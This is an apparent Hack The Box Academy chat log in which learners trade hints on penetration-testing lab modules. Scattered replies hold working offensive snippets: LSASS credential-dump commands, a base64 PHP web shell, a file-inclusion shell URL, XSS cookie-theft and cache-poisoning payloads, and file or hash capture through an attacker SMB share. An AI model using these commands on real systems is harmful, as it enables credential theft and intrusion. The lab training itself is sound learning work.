rustic sage
Can someone explain the fortress labs and what is the difference between them and pro labs
If Iβm in the wrong area lmk
I get you need points for fortress but they seem like an earned version of pro labs instead of paid
solid escarp
Were you able to get it?
I didn't have time to read your last message
narrow solar
idk why it got deleted, give me a minute please
narrow solar
first, i tried having the file script.js as in the pic, with this payload
rustic sage
Can someone explain the fortress labs and what is the difference between them an...
Pro Labs you need to pay for. you can only get access to them via a subscription.
Fortresses you get with i believe the Hacker rank on HTB.
you need to verify your account to see access to the channels for these. #welcome
Ok I will one last question, other than pay vs earn strategy, are these the same?
Im talking actual lab time and lab experience im not seeing the difference e
narrow solar
then i tried this payload , and got this
solid escarp
Ah I see
rustic sage
Ok I will one last question, other than pay vs earn strategy, are these the same...
not really... Pro Labs are multiple machines (i.e. you're attacking a network).
i believe Fortresses are just single machines.. like Akerva mainly just focuses on web attacks
Ah there we go that makes sense
Just a private earned single machine
Got it thanks buddy
hallow kiln
pretty sure they're not private
rustic sage
Private to those that didnβt earn the rank hehe
solid escarp
So the script tag you inject should be using the src= to grab the script.js hosted on your machine. The script.js will have the code that will send the cookie
hallow kiln
and Hacker rank unlocks 4 of them which are retired, the remaining three require Guru rank for some reason
hallow kiln
shared you mean?
rustic sage
and Hacker rank unlocks 4 of them which are retired, the remaining three require...
huh? all Fortresses can be done with the Hacker rank
I need to put on my big boy pants and actually do an active box. That is not retired so I can earn points.
rustic sage
i think both `Pro Labs` & `Fortesses` are public
yes shared
hallow kiln
huh? all `Fortresses` can be done with the Hacker rank
oh lmao, I'm sorry, I was thinking Endgames for some reason
narrow solar
So the script tag you inject should be using the src= to grab the script.js host...
yes, but it didnt work
hallow kiln
too many things
rustic sage
I meant endgames
Single machine too?
Yes it is
@rustic sage Endgames are good as well.. they're like Pro Labs but a lot smaller... you need to be Guru to unlock them or buy VIP and get access to the retired ones only.
Ok endgame is a smaller free but rank earned lab got it
:wipes brow: man thatβs confusing
solid escarp
Hm. I think I used xmlhttprequest payload for my script.js when I did it blind. Didn't try the HTB guide payload
It looks like the HTB guides payload should work though
rustic sage
Ok endgame is a smaller free but rank earned lab got it
Endgames aren't free, unless you pwn a lot of active machines and achieve Guru.
hallow kiln
machines + many, many challenges
hallow kiln
with 150+ active challenges, it's just not doable tbh, but that's probably a skill issue on my side
rustic sage
Donβt say that
Thereβs many that canβt do it all
Itβs called life and responsibility
Dudes that are top 10 on hTB
Jk
merry mountain
The "Limited File Uploads" module gets you there.
narrow solar
It looks like the HTB guides payload should work though
it worked now for some reason π thank you so much for your timeπ
solid escarp
No problem. Glad you got it!!
narrow solar
have great day
solid escarp
You too. Congrats on getting to the end and good luck on the exam!
shadow zealot
Hey peeps... I must be doing something wrong but I can't get the right answer to What is the CVSS score of the public vulnerability CVE-2017-0144?
https://academy.hackthebox.com/module/75/section/763
I've tried every different way I can think of to give the answer but it's always wrong
rustic sage
try looking up the score for cvss version two instead of three
shadow zealot
try looking up the score for cvss version two instead of three
Well... there you go π
tidal kelp
was the easiest way to URL encode a base64string?
rustic sage
was the easiest way to URL encode a base64string?
probably cyberchef or any url encoder you can find online
solid escarp
was the easiest way to URL encode a base64string?
In burp CTRL+U the selected string. Or the encoder tab
I like to use CyberChef as well for encoding
tidal kelp
hmm
olive fiber
Attacking SQL Databases.
Cannot having responder to work to get the hash. Any advices?
tidal kelp
ON the File Inclusion Module > Once you have base64 encoded your web shell it says "we can URL encode the base64 string"
I got the same base64 string: PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==
But when I URL encode it, i dont get the same output as the in the session, hence I'm not able to utilize it.
Any idea what I might be doing wrong here?
misty current
Hit that enocde special characters
vast geyser
Hello, I am stuck in XSS Phishing section, I want to remove the image input and bad icon
How can I do?
frozen mesa
Hacking WordPress --> skill assessment --> + 1 Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
I've looked through the plugins but did not find a flag like thing. Any nudge that can help me to finish this module? Got all the other questions π
tidal kelp
Hello, I am stuck in XSS Phishing section, I want to remove the image input and ...
try escaping "<img src" before adding your script
vast geyser
try escaping "<img src" before adding your script
Hi , I try to use "> to escaping but failed. Could you give me some hint?
tidal kelp
try '>
tidal kelp
not sure. Had same issue yesterday and it worked for me
solid escarp
Double quote is probably a bad character that's getting encoded. Notice " is getting replaced with " which is encoded form of "
vast geyser
umm.. I found when I useing "view-source" in FireFox it display single quote
But if using F12 to see it display Double quote
silk minnow
hi im facing same problem, how u solve this ?
can u give me hint ?
Not sure if someone already replied you but for my case, I put it in the wrong writable folder. Probably need to look for other writable shared folders.
frozen mesa
Hacking WordPress --> skill assessment --> + 1 Use a vulnerable plugin to down...
If anyone... I've checked all the plugins mentioned by WPScan but no results yet...
rustic sage
If anyone... I've checked all the plugins mentioned by WPScan but no results yet...
i don't remember this exactly, but there are other ways other than wpscan to enumerate plugins
see if you miss something.. that or research online the plugins and it's version
frozen mesa
Only ways i could think of is exploiting them one by one... trying thast right now
sly dome
Only ways i could think of is exploiting them one by one... trying thast right n...
wpscan indeed list some CVEs and one of them is what you need π
frozen mesa
Almost all of them done, alot of info but no download file that appears a flag.
sly dome
the CVE is exactly βunathenticated file downloadβ
frozen mesa
the CVE is exactly βunathenticated file downloadβ
found it! But not in the results from WPscan, it was Google that gave me the result when i searched for "unauthenticated file download"
Thanks!
rustic sage
did you enumerate all plugins with wpscan?
also a good lesson to never fully rely on automated tools
fathom pendant
Hi! I got stuck with Attacking Common Services, Attack DNS.
I found a few subdo...
Gotta zone transfer to the right one
sly dome
found it! But not in the results from WPscan, it was Google that gave me the res...
did you use a wpscan token?
that is essential
frozen mesa
did you use a wpscan token?
Yes
sly dome
I got it with wpscan
grizzled schooner
SMTP module : Module teaches to use ||telnet <ip> <port>|| all that I have received is || Trying <ip> followed by "telnet: Unable to connect to remote host: No route to host"|| any ideas?
fathom pendant
SMTP module : Module teaches to use ||telnet <ip> <port>|| all that I have recei...
I assume you're using <ip> as a placeholder for the 10.x.x.x ip the module gives you? Are you connected to the vpn?
grizzled schooner
yes and yes
fathom pendant
So you're doing telnet $ip $port (you do need to specify port)
grizzled schooner
the exact syntax that I ran was ||telnet 10.129.75.25 25||
fathom pendant
If you do ip a you only have 1 tun connection yeah?
grizzled schooner
yeah I only see one
sly dome
but can you ping the machine? the error is no route to host
grizzled schooner
I was able to run the nmap scan and get results, I don't know if there's a difference in that and ping but I'll give it a try quick
sly dome
im just basing my advice on the provided error
grizzled schooner
I had to restart it a couple of times, but it eventually worked, thanks
sly dome
ππ½
grizzled schooner
how do I find the name on the SMTP server, I'm a little lost... can anyone give me a nudge?
solid escarp
Like a username? Use the VRFY, RCPT TO or EXPN to enumerate users. You can make a bash script to run through a list of names. There's also a tool that can be used to automatically enumerate SMTP users using a specified method. Smb-user-enum I believe
grizzled schooner
cool thanks
fathom pendant
Like a username? Use the VRFY, RCPT TO or EXPN to enumerate users. You can make ...
Smtp-user-enum
solid escarp
Right lol
vagrant orbit
Is anyone able to help me with the SQLMap Essentials skill assessment? I have searched far and wide but can't seem to find the injectable spot. Thought it might be in the search feature but alas that does not work.
Edit: found it, but goodness me that is a well hidden spot. My advice to the next person: Act as though you wanted to buy something π
silent oyster
Can anyone let me know how long it takes to get the reset password email? Iβve been waiting awhile.
neat sky
has anyone gotten a vbox kernel error
i was doing a windows priv esc module and now im getting this error
quick magnet
Not sure if someone already replied you but for my case, I put it in the wrong w...
Ya someone already reply thanx
mild valve
Guys, can I ask you about this question: It's Pass The Ticket from Linux
Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
I connected to SMB using the keytab file but I tried to transfer the keytab file to my machine to authenticate as LINUX01$ but didnt succeed.
Is this possible and was getting the file through smbclient the correct way to go?
sly dome
itβs possible if you tunnel the traffic through the pivot
rustic sage
How did you manage it? I'm really stuck with this , could you help me?
tidal kelp
Module: File Inclusion
Session: Remote File Inclusion.
What is the syntax needed to navigate among the dir? A little bit stuck on the navigation part
mild valve
Why do you not just get a reverse shell?
fathom pendant
Module: File Inclusion
Session: Remote File Inclusion.
What is the syntax needed...
just change commands
mild valve
just change commands
tidal kelp
Why do you not just get a reverse shell?
Could try. Just trying to follow along with she section
fathom pendant
in the screenshot you're showing using ls /'which is doing the ls command on the root (/) directory
try changing up the commands or maybe the question offers a suggestion where to look
rustic sage
Module: File Inclusion
Session: Remote File Inclusion.
What is the syntax needed...
ls+/
tidal kelp
try changing up the commands or maybe the question offers a suggestion where to ...
Im with you so far
my problem is get no result when trying to look in a different dir. I think I might be using the wrong input
main spear
Hello, can someone help me with the DNS part of "Attacking Common Service" ? I dont get it how to brute force subdomains
rustic sage
try ls%20//
vale ivy
can someone explain or provide the answer for this working with ids/ips skill assessment There is a file named wannamine.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the Overpass-the-hash technique which involves Kerberos encryption type downgrading. Replace XX with the appropriate value in the last content keyword of the rule with sid XXXXXXX within the local.rules file so that an alert is triggered as your answer.
acoustic owl
What have you tried?
vale ivy
I've tried changing the content XX with SID and checked but no alarms was triggered
acoustic owl
You only have to replace the last two XX with the last two numbers of the SID
vale ivy
yeah I did but still no alarms was triggered
acoustic owl
Then you have probably used the wrong SID
fathom pendant
hey @acoustic owl i made a grave error in thinking i could simply just pick back up where i left off in ad enum and attacks LMAO spent 10 minutes figuring out my Skill issue
acoustic owl
hey <@868599843776512030> i made a grave error in thinking i could simply just p...
Haha, what do you need help with?
fathom pendant
attaining monner
i figured it out (I forgot to tell the query to also look for the object to be a person)
I figured I needed to make the query = 2 for the account disabled bit
acoustic owl
the sid given was 9999999
where is 999999 given?
vale ivy
in the local.rules wannamine.pcap sid
acoustic owl
i figured it out (I forgot to tell the query to also look for the object to be a...
Look on the bright side. You certainly won't make this mistake a second time
acoustic owl
in the local.rules wannamine.pcap sid
Take another look at the SID.
acoustic owl
You do not have to adjust the SID. You have to adjust the rule with this SID.
You have to adjust the content
sterile epoch
Hi, can we create a dump file using cmd.exe and PID?
vale ivy
yeah i have changed the content xx with 99
acoustic owl
No, SID is not content
fathom pendant
Look on the bright side. You certainly won't make this mistake a second time
I had to guess the account name the first time because I forgot to add the filter for the samaccountname
vale ivy
so what i have to replace xx with i am trying from past 2 days please let me know
acoustic owl
so what i have to replace xx with i am trying from past 2 days please let me kno...
DM
simple citrus
Gitlab - Discovery & Enumeration
next bronze
Hi, can we create a dump file using cmd.exe and PID?
if you have sufficient privs, yes
sterile epoch
can you tell me the command for it please?
The module only mentions powershell command using rundll32
next bronze
yeah, because that works without having to transfer procdump over, what's wrong with that approach?
sterile epoch
it only works for powershell I guess. I just wanted to know any alternatives for notes purpose
next bronze
powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id C:\users\public\lsass.dmp full
you can run this in cmd
sterile epoch
Thanks
next bronze
or
procdump.exe -accepteula -ma lsass.exe lsass.dmp
but you'll need to transfer procdump to the target
sterile epoch
ok thanks
olive ibex
Can some one help I am stuck on this one. I am not sure why I canno share a screenshot on here as well
SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.
bright quiver
Questionβ¦if Iβm looking to transfer a file from a windows box using powershell to my Kali box. How can I do that? I canβt use scp and only like net use or smb. Does anyone know and can share the commands ? Iβve tried net use \ip of Kali /home/kali/my share but doesnβt seem to work. I get a network name not found error. I as
next bronze
Questionβ¦if Iβm looking to transfer a file from a windows box using powershell t...
for smb you can use impacket's smbserver, for http you can use psupload, there are a ton of ways
bright quiver
Okayβ¦Iβll try those two ways instead - thanks @next bronze
next bronze
Okayβ¦Iβll try those two ways instead - thanks <@160299645250043904>
with smb you don't need net use, just use it like a network drive
cp file \\10.0.0.1\share\
@next bronze and on my Kali machine I setup the server to listen/receive?
next bronze
correct
bright quiver
Ok cool ty
thorn urchin
yeah Im a fan of smbserver for uploading to attacker
next bronze
with impacket's smbserver there's the added benefit of stealing whoever is connecting's hashes, could be useful sometimes
thorn urchin
yup
leaden yew
Anyone else had any issues with spawning the target for Attacking Common Applications->Other Notable Applications? Its been about 10 minutes and nothing has spawned.
lofty wave
Is anyone else having issues spawning lab targets?
Trying to work on the medium footprinting lab and the target just sits:
Tried other previous labs. Same thing. Even on a different browser and computer.
leaden yew
ah good its not just me.
lofty wave
Anyone else had any issues with spawning the target for `Attacking Common Applic...
Yep, same here
Targets in regular HTB are working fine. Seems to be limited to academy targets?
fathom pendant
Targets in regular HTB are working fine. Seems to be limited to academy targets?
Main htb and academy are separate networks technically speaking
lofty wave
Main htb and academy are separate networks technically speaking
I figured as much. Wanted to see just incase as a troubleshooting step in making sure the issue isn't on my end.
leaden yew
I figured as much. Wanted to see just incase as a troubleshooting step in making...
Looks like its working again
lofty wave
Looks like its working again
Yep, all good here too.
stoic tangle
Hello i was wondering if sombody is new to hacking and if u want to be teached message me [and mods/owners don ban me i wont teach the proffesional hacks just wifi]
fathom pendant
Hello i was wondering if sombody is new to hacking and if u want to be teached m...
If you don't have permission it's still illegal
stiff bone
Hi all. Please, help me with the ABUSING HTTP MISCONFIGURATIONS module with the first task (yes, the first task of the module in the chapter Identifying Unkeyed Parameters). Iβve been trying to solve it for the second week now and have tried a bunch of different complex tests, but the result is the same, I donβt get the flag. And it seems to me that Iβm doing something wrong and I just donβt understand what it is anymore. I started doing it again step by step like in the module, but it still ends in failure.
Steps I followed:
- Sent a cache poisoning request using XSS via the ref parameter.
||GET /index.php?language=de&ref=%22%3E%3Cscript%3Eyour_script_XSS%3C/script%3E HTTP/1.1||
-
Received a response with X-Cache-Status: HIT, which indicates that the request was cached.
-
after the first step, the next request is sent immediately, which activates my XSS script at /admin.php?reveal_flag=1.
||GET /admin.php?reveal_flag=1 HTTP/1.1
Referer: http://webcache.htb/index.php?language=de&ref="><script>your_script_XSS</script>||
- I tried to look at the answer in several tabs and quickly go to other tabs to activate the load through the transition, everything is hopeless. I just beg you, help, 2 weeks on one question is too much
woven copper
Hi all. Please, help me with the ABUSING HTTP MISCONFIGURATIONS module with the ...
hello there, have you confirm that ref parameter its vulnerable to reflected XSS ? o just repeat the module ?
recomended confirm the XSS First with a basic alert() payload
stoic hare
I don't understand how to do that
The flag will print in the banner upon successful login on the host via SSH.
Im logged in, but didn't get any message
Skills Assessment - INTRODUCTION TO WINDOWS COMMAND LINE
fathom pendant
@acoustic owl I'm probably being real dumb but I cracked the password for the account for QUestion one of Kerberoasting from Linux in the AD Enum module but i'm drawing a blank for how to authenticate with it i'm probably overlooking something super simple though
subtle flicker
hey! i have to ask a question about the "Attacking Applications Connecting to Services" section in "Attacking Common Applications".
I've followed the disassembling part in Linux for the "Octopus_checker" elf file.
I've noted that in the walkthrough, the call to the SQLDriver uses a "full" address, but in my kali machine it doesn't.
Here's what in the section:
0x0000555555555607 <+433>: call 0x5555555551b0 <SQLDriverConnect@plt>
This is what i have in my kali box:
0x0000000000001607 <+433>: call 0x11b0 <SQLDriverConnect@plt>
adding a breakpoint to the 0x11b0 doesn't work. It's probably some type of config issue i guess, if someone knows what it is would really help me, thanks!
hallow kiln
<@868599843776512030> I'm probably being real dumb but I cracked the password fo...
I don't recall having to authenticate anywhere, at least there's nothing in my notes about it, are you having an issue with the second question?
fathom pendant
I don't recall having to authenticate anywhere, at least there's nothing in my n...
yeah i got through some of it it's just trying to narrow my search down tbh
but my brain isn't braining
hallow kiln
for the second question, I just checked bloodhound
subtle flicker
i forgot my password and stuff for neo4j and crying on the inside
if i remember correctly you can delete a file and reset the psw
don't remember which one
hallow kiln
yeah, I've forgotten it too at some point, you can definitely reset it
subtle flicker
yes i remember i've seen something about it when i settled it up for the first time
also most likely i've had forgotten mine, so will have to research it π
hallow kiln
I also kept forgetting my Nessus password, so I finally wrote down in my notes how to reset it
fathom pendant
yeah, I've forgotten it too at some point, you can definitely reset it
I resolved without bloodhound, i was just stoopid
hallow kiln
Glad you solved it
rustic sage
@everyone
thorn urchin
did you try both possible cache files
heavy marsh
yes
one keeps going away, I tried about 10 times yesterday periodically since they kept changing, and just tried three times
are my commands right though?
thorn urchin
looks fine
heavy marsh
looks fine
Just got it. It was simple, I kept putting /root/krb....... when I was already in root. I just needed to name it without the root.
I also didn't use "export" I dont know if that matters
thorn urchin
eh if it works it works
thorn urchin
it doesnt like your get command
presumably the argument after it is throwing it off but idk, I always leave -c at the end if I were to use it(I usually dont)
heavy marsh
presumably the argument after it is throwing it off but idk, I always leave -c a...
I figured it out, but what does -k do?
I can't find it in --help or the man page
solid escarp
I believe -k is to use kerberos authentication
heavy marsh
I believe -k is to use kerberos authentication
That makes sense, I'm going to read more into that later.
tough coyote
Can anyone assist me?
tough coyote
it depends
one moment trying to get the snippet
I am HTB Academy Windows Priv Esculation the Skill Assessment Part 1
and I dont know how to get on system
I tried and nmap
but kinda stuck
fathom pendant
nmap isn't gonna be enough
tough coyote
nmap isn't gonna be enough
I see
tough coyote
During a penetration test against the INLANEFREIGHT organization, you encounter a non-domain joined Windows server host that suffers from an unpatched command injection vulnerability. After gaining a foothold, you come across credentials that may be useful for lateral movement later in the assessment and uncover another flaw that can be leveraged to escalate privileges on the target host.
For this assessment, assume that your client has a relatively mature patch/vulnerability management program but is understaffed and unaware of many of the best practices around configuration management, which could leave a host open to privilege escalation.
Enumerate the host (starting with an Nmap port scan to identify accessible ports/services), leverage the command injection flaw to gain reverse shell access, escalate privileges to NT AUTHORITY\SYSTEM level or similar access, and answer the questions below to complete this portion of the assessment.
so thats what I read
fathom pendant
yes and there's usually a related question underneath the spawn target button that leans into what you should try first
nmap shows open ports > open ports = vulnerabilities
tough coyote
I did my scan
fathom pendant
you'll need to combine all of the information from the whole module to gain access
tough coyote
I think I get what you're saying
I have to go back to few modules or sections
to get the answer
fathom pendant
does it tell you to brute force with ssh and hydra on that port?
rustic sage
if i'm understanding the directions correctly it does?
fathom pendant
if i'm understanding the directions correctly it does?
it does not
it's telling you to brute force the existing auth mechanism on the website
nowhere in the question does it even hint at ssh
and being able to access it via web should be the further clue you're barking up the wrong tree
rustic sage
thank you so much
fathom pendant
don't thank me for your inability to read
rustic sage
lol
slow wind
Hey quick question does anyone else ever experience their shell breaking when they try to upgrade a dummy shell to fully interactive?
rustic sage
yes sometimes that happens to me
slow wind
I cant enter shit it, it interprets [enter] as ^M instead
i have to kill the window even and get a reverse shell again
am i doing something wrong?
rustic sage
once you get another reverse shell try using python
i generally have good luck with python tty
rustic sage
tty is short for teletype aka an interactive shell
fathom pendant
I do: python -c 'import pty;pty.spawn("/bin/bash")
don't forget to close the single quote
rustic sage
try the cheat sheet here https://github.com/RoqueNight/Reverse-Shell-TTY-Cheat-Sheet
rustic sage
try spawning a bin/bash one next
slow wind
mind if i send a screen cap of whats going on
fathom pendant
that sure don't look like an academy module my guy
brazen apex
its from shells
rustic sage
why does it say offsec proving grounds?
fathom pendant
"connection from an "Photographer" as shown in your screencap too
slow wind
i changed the hostname lmao
fathom pendant
also when you go back to fg do reset and it'll reset the terminal back to normalish
fathom pendant
either way doesn't look like it's related to https://academy.hackthebox.com
fathom pendant
normalish?
yeah it means kinda normal
rustic sage
what differences?
fathom pendant
hopefully an actual interactive shell, for one
rustic sage
hopes and prayers are what seemingly fuel every penetration test
i updated to vmware workstation pro 17.5 and my kali instance has been freezing nonstop lol
i hope and pray it doesn't do that on the exam
fathom pendant
i updated to vmware workstation pro 17.5 and my kali instance has been freezing ...
skill issue tbh
rustic sage
it freezes with the highlight capital i cursor and won't let me click windows Β―_(γ)_/Β―
slow wind
just making sure have you tried clicking right ctrl
rustic sage
i have it in the mode where you don't need to do that like my mouse is free to move from host and the vmware window without having my mouse locked inside the woindow
round gale
hello, in the LFI and File uploads section of File inclusion module, once we upload a profile pic, we access the uploaded pic by viewing the page source code. now when trying to execute the shell we put in ./profile_images/ like this http://x.x.x.x:port#/index.php?language=zip://./profile_images/shell.jpg@cmd=id. the reason why use the dot before profile_images as per the module is the vulnerable page(index.php) is in the main directory. what does this mean exactly i didnt get it
fathom pendant
hello, in the LFI and File uploads section of File inclusion module, once we upl...
it's telling it to look from the /var/www or wherever the webroot is
instead of from system root C:\ or /
rustic sage
round gale
ah k thanks
rustic sage
i hope that link helps
fathom pendant
it could also be what moo linked
it's not a native command so you have to tell linux that it is in fact a command and NOT an image
(get tricked filters :^))
round gale
thanks @rustic sage @fathom pendant
rustic sage
no worries i love to help out but i will never be as helpful as marcielee
rustic sage
so /bash/ -i
slow wind
i mean you can just type bash
rustic sage
oh
rustic sage
super cool!
slow wind
no more broken shells
rustic sage
i'm extremely tired and none of my things are working will come back to it tomorrow
slow wind
for an explaination for it and i feel dumb too
slow wind
basically kali uses zsh by default obviously
rustic sage
feeling dumb is good
slow wind
so you gotta swap to bash :p
slow wind
π¦Ύ always keep learning
slow wind
except when you gotta take the oscp exam this mf is coming up soon ive been on the grind lol
slow wind
I want to do that but getting as many skills as i can first so whatever i apply to will let me work remote
rustic sage
make sure to get passive income too!
i should have taken the cpts exam already but i was busy trying to buy a house and now that i have a house life just got a whole lot easier
passive income gives you the freedom to do what you enjoy most
slow wind
exactly keep on that grind tho
slow wind
ima get back to this lab gl with this
stiff bone
hello there, have you confirm that ref parameter its vulnerable to reflected XSS...
so you want to say that in fact I had to look for another parameter, and not go step by step through the chapter? π₯²
old plaza
I am not able get the MAP + RW in the xdbg after importing restart-servive.exe into xdbg debugger
reef drift
Hey, I'm stuck with the last flag, I sended you a message
olive fiber
Hello to everyone. "Attacking Common Services - SQL"
Any tip about this? Cannot get the hash using responder.
stoic hare
I don't understand how to do that, help me pls
The flag will print in the banner upon successful login on the host via SSH.
Im logged in, but didn't get any message
Skills Assessment - INTRODUCTION TO WINDOWS COMMAND LINE
tidal kelp
On *File Inclusion >Log Poisoning * Are you suppose to be able to get the flags with PHP Session Hijacking? I have no problem getting cmd=id. But as soon as I try to change cmd, I get nothing back
stoic hare
and find the flag
Where do I have to find it?
naive wadi
Hello to everyone. "Attacking Common Services - SQL"
Any tip about this? Cannot ...
maybe if you run responder and forced the srvc to have to auth to something you could get the hash? This is a hint, not speculation.
olive fiber
Where do I have to find it?
I supposed to the question
i think the question will give you the credentials
hidden trellis
Has anyone done the advanced XSS skill assessment I could ask a question to?
stoic hare
i think the question will give you the credentials
I have connected by ssh to the target. What I need to do?
olive fiber
Just enumerate and find the flag. Search the folder. Usually you find the flag on users home or Desktop.
Secondly: Try to not do questions like this before you search on your own and try. If you feel that you tried everything then ask on the groups or search onlnie
tidal kelp
On *File Inclusion >Log Poisoning * Are you suppose to be able to get the flags...
nvm, manged so solve this with PHP Session Hijacking
olive fiber
maybe if you run responder and forced the srvc to have to auth to something you ...
Supposed that i already tried that
naive wadi
Has anyone done the advanced XSS skill assessment I could ask a question to?
always ask the specific quesition, include what you have done already and ensure to use spoiler tags for spoilers. You are way more likely to get an answer
naive wadi
Supposed that i already tried that
well, you maybe did it wrong? It worked for me
just checked my notes
olive fiber
well, you maybe did it wrong? It worked for me
Could be, i try and let you know. Maybe i am missing something
naive wadi
Could be, i try and let you know. Maybe i am missing something
99% of the times something is not working for me its something minor, reread section and go again always helps
earnest junco
Hi, i kindly need some sort of clarity as to why i am getting this error
keepass2john Login.kdbx > kdbx.hash ! Login.kdbx : Unknown format: File signature invalid
I used Base64 for the transfer and the MD5 hashes match
next bronze
Hi, i kindly need some sort of clarity as to why i am getting this error
`keep...
which module is that
earnest junco
which module is that
it's Password Attack Lab Hard
next bronze
generally, don't use b64 to transfer anything other than text bases files
next bronze
there should be other ways that you can transfer files?
hidden trellis
Has anyone done the advanced XSS skill assessment I could ask a question to?
At this stage the available path seems to be file upload however I am having trouble making this workβ¦
obsidian bridge
hello guys i need help nosql skill assesment two,Can someone help me
naive wadi
just ask the actual question and say what you have already tried. People are doing different modules so you may get an actual answer if you are specific about what you need help with.
obsidian bridge
okey sorry
i tried all payloads that learned the lesson but didn't work
i can not bypass autentication
obsidian bridge
please help mee
floral condor
Okay, since I acknowledged that individual modules seem to not be possible to be purchased and given as a gift. I had one idea to bypass the problem, but I don't know if this could be done or is even legal.
Is it possible to create an account and buy the specific courses that I want to gift, then give this brand new Academy account as a present?
solid escarp
I think HTB gift cards work on the academy. There's an option to buy cubes you can use to buy modules using a gift card on the academy. Not sure how you get a gift card though.
That could work?
autumn pilot
You can buy a gift card and send it to the person
quick bone
Okay, since I acknowledged that individual modules seem to not be possible to be...
better to present gift card init?
supple patio
you may DM if you didn't resolve it yet
obsidian bridge
i need help nosql two skill assetsment can someone help me
vital adder
Okay, since I acknowledged that individual modules seem to not be possible to be...
can you buy gift cards for the academy here: https://www.hackthebox.com/giftcards
mild valve
My god, Pass the ticket on Linux, I learned so much with keytab and ccache ,didnt know about this
What a beast module
vagrant orbit
Good afternoon everyone - is anyone able to help me on the Attacking Tomcat section of the attacking common applications module? I have RCE but can't find the flag.
Nevermind - got it
tidal kelp
On the Skill assessment for File Inclusion. Can I get a hint what wordlist to use? doesn't seem to be LFI-Jhaddix one
vagrant orbit
Good afternoon everyone - is anyone able to help me on the Attacking Tomcat sect...
For the next homie: check ALL the folders, you can't miss it.
sly dome
On the Skill assessment for File Inclusion. Can I get a hint what wordlist to us...
you donβt need one
tidal kelp
you donβt need one
Elaborate please
sly dome
spoilers and what more do you need then from a wordlist xd
you have all you need now start enumerating to get RCE
tidal kelp
well I guess I manually guess that path apache of nginx..
tidal kelp
but just thought one should use the automated scanning
warped cloak
ACTIVE DIRECTORY ENUMERATION & ATTACKS
In Attacking Domain Trusts - Child -> Parent Trusts - from Windows:
Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain.
I use ls \\academy-ea-dc01.inlanefreight.local\c$ and can see contents of C drive but not sure what command to use to get into subdirectories from here. If I try using ls \\academy-ea-dc01.inlanefreight.local\C\ExtraSids$ I get a "cannot find path" error.
tidal kelp
apache of nginx? and please delete the picture
the picture is added as spoiler?
sly dome
the picture is added as spoiler?
and xd
obsidian bridge
i need help nosql injection in two skill assesment can someone help me
sly dome
i still can click and see one key point to solve that assessment
sly dome
ACTIVE DIRECTORY ENUMERATION & ATTACKS
In Attacking Domain Trusts - Child -> P...
find out what $ means here
tidal kelp
ok, just thought it was enough to add it as a spoiler...
sly dome
but just thought one should use the automated scanning
dont rely on automated tools for such simple tasks
tidal kelp
fair enough, thx
warped cloak
find out what $ means here
ah i see had to keep $ next to the c and not put it on the end
sly dome
ππ½
umbral fulcrum
hey guys, in module "SQLMap Essentials" ==>> "Attack Tuning" I got the "flag 5" content: HTB{7....7}.
but it gives me:
Error
Incorrect answer!
does someone know HTF I deal with it? (BTW no, there R no spaces and stuff, just the flag)
umbral fulcrum
hey guys, in module "SQLMap Essentials" ==>> "Attack Tuning" I got the "flag 5"...
not sure Y, but G=1 fix it
umbral fulcrum
not sure Y, but G=1 fix it
if someone knew please let me know ...
it might B HTB's error that they need to fix
summer flame
Hi, anyone doing "WINDOWS ATTACKS & DEFENSE" module skills assessment? the machine is really really slow, i cannot even do a copy. not sure if what is the issue.
primal mesa
hi can someone help me with footprinting lab hard; im unable to ssh to mysql from the user t**. am i on the right path? i have tried with password to connect to mysql. error there too. any help would be great
getting this error when trying to ssh
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
rustic sage
hi can someone help me with footprinting lab hard; im unable to ssh to mysql fro...
checkout the other ports, doesn't sound like you're ready for ssh yet
mossy nest
Hey guys, I'm doing the Active Directory Skill Assesment 2
I'm currently trying to escalate privilege into the machine MS01 172.16.7.50
Tried to mimikatz, but as I'm not Nt authority doesn't work
Tried to use PrinterSpooler.exe but didn't work
Does anyone can give me a nudge
next bronze
Does anyone can give me a nudge
which question are you working on?
mossy nest
- 1 Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
I'm connected in xfreerdp to MS01 by using BR086 user and a proxychains
next bronze
enumerate the rights of the users you have credentials to
mossy nest
sechangenotifyprivilege
You mean about this one Β§?
Tried to google it but I can't see how to use it
next bronze
not that, check the privs of all the users you have
mossy nest
Ha ! Thanks
I'll try
Well tried on both user ***20 And ***86 at the moment the only other user I have is an sql
next bronze
Well tried on both user ***20 And ***86 at the moment the only other user I have...
might want to remove that, spoilers
at this point you have full admin access to SQL01 right?
mossy nest
Yes
Mmmh... Okey I should try to know more about what right are enable for the admin of SQL01
stoic hare
I have a task
The flag will print in the banner upon successful login on the host via SSH.
Im logged in, but didn't get any message, also I checked all the directories. And i don't understand how to find a the flag, I don't know even how does it look like.
The hint is "This is where Alice went..", how can I use this?
Skills Assessment - INTRODUCTION TO WINDOWS COMMAND LINE
fathom pendant
I have a task
`The flag will print in the banner upon successful login on the ho...
It'll be above the first line of where it lets you type
The banner is the "welcome" message
stoic hare
The banner is the "welcome" message
I didn't receive anything else, only
user0@10.129.204.9's password: Microsoft Windows [Version 10.0.22000.1219] (c) Microsoft Corporation. All rights reserved.
fathom pendant
Weird
next bronze
it's before you enter the password, ssh clears your terminal after logging in
stoic hare
I didn't receive anything else, only
`user0@10.129.204.9's password:
Microsoft ...
oh, i found it, thx
fathom pendant
it's before you enter the password, ssh clears your terminal after logging in
Is it? Because the question states "on successful login"
next bronze
yeah just checked it, question should've been clearer I supposed but, it's also... right there
swift forge
Anyone familiar with the Getting Started lesson? I'm on the Nibbler exercise and am trying to reverse shell in, but the netcat listener is not connecting to the target
next bronze
Anyone familiar with the Getting Started lesson? I'm on the Nibbler exercise and...
what have you tried and what's the reverse shell you used?
swift forge
